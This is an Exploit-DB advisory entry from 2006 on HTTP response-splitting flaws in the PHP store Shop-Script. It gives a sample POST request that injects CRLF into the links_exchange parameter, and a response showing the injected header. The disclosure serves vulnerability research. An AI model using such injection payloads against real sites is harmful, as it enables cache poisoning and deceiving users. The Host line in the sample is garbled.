Shop-Script - Multiple HTTP Response Splitting Vulnerabilities

EDB-ID:

28845


Platform:

PHP

Published:

2006-10-23

source: http://www.securityfocus.com/bid/20685/info

Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. 

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

[Request Header] 

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header 
HTTP/1.0 
Accept: */* 
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET 
CLR 1.1.4322) 
Host: www.example.comhttp://www.shop-script-demo.com/
Content-Length: 18 
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa 
Connection: Close 
Pragma: no-cache 

current_currency=1 


[Response Header] 

HTTP/1.1 302 Found 
Date: Mon, 16 Oct 2006 17:39:57 GMT 
Server: Apache 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0 
Pragma: no-cache 
Location: index.php?links_exchange= 
FakeHeader:Fake_Custom_Header <= [Custome response 
injected by the attacker] 
Content-Length: 0 
Connection: close 
Content-Type: text/html